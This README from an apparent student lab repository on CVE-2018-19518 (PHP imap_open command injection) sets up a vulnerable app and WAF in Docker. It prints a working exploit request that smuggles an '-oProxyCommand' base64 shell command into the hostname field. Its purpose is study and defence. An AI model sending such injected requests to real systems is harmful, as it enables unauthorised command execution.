some works on CVE-2018-19518 CVE-2018-19518
==============
last rapport here : https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF
## Usage
### run app
```console
docker-compose up -d
```
example normal usage for the web app.
- imap : webmail.grenoble-inp.org
- user : prenom.nom@grenoble-inp.org
- password : xxx
### exploit
using ```echo '1234567890'>/tmp/test0001```.
```
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
```
### check
```docker-compose exec app bash``` and read the file ```cat /tmp/test0001```:
## waf
- https://github.com/theonemule/docker-waf
## Relevant commit
- https://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb
## References
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
- https://nvd.nist.gov/vuln/detail/CVE-2018-19518
- https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb
[4.0K] /data/pocs/f3fd9e0a6b8bde97378d2ee51139a3793c613e72
├── [4.0K] app
│ ├── [ 230] Dockerfile
│ └── [4.0K] www
│ └── [2.8K] index.php
├── [ 117] docker-compose-msf.yml
├── [ 139] docker-compose-waf.yml
├── [ 117] docker-compose.yml
├── [4.0K] docs
│ ├── [ 87K] edit-request.png
│ ├── [ 98K] firefox-dev.png
│ └── [785K] gmail.png
├── [4.0K] msf
│ ├── [ 230] Dockerfile
│ ├── [ 650] imap.php
│ └── [4.0K] www
│ └── [ 650] imap.php
├── [ 15K] rapport.md
├── [1.3K] README.md
└── [4.0K] waf
├── [ 30K] crs-setup.conf
├── [2.3K] Dockerfile
├── [1.3K] modsec_includes.conf
├── [8.5K] modsecurity.conf
└── [3.2K] nginx.conf
6 directories, 18 files